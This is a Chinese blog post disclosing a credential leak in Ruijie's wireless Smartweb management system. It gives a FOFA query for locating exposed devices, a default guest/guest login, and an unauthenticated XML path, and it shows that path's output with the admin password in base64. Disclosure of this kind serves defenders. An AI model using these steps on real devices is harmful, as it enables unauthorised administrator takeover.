锐捷 Smartweb管理系统 密码信息泄露漏洞

| | | | 220

漏洞描述

i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

漏洞影响

s ✅锐捷网络股份有限公司 无线smartweb管理系统

空间测绘

d ⭕FOFA:title="无线smartWeb--登录页面"

漏洞复现

  • ✅访问首页,存在账号guest/guest登陆

image-20220410150054904

  • 而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到

image-20220410150612702

  • 访问未授权路径/web/xml/webuser-auth.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<userauth>
<user>
<name>
<![CDATA[ admin ]]>
</name>
<password>
<![CDATA[ YWRtaW46cXNsYmJzaHlj ]]>
</password>
<page>all</page>
<level>0</level>
<favorites>
<![CDATA[ ]]>
</favorites>
</user>

image-20220410150812679

个人博客

孤桜懶契:https://gylq.gitee.io/time

本文标题:锐捷 Smartweb管理系统 密码信息泄露漏洞

文章作者:孤桜懶契

发布时间:2022年04月10日 - 14:59:23

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/18.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️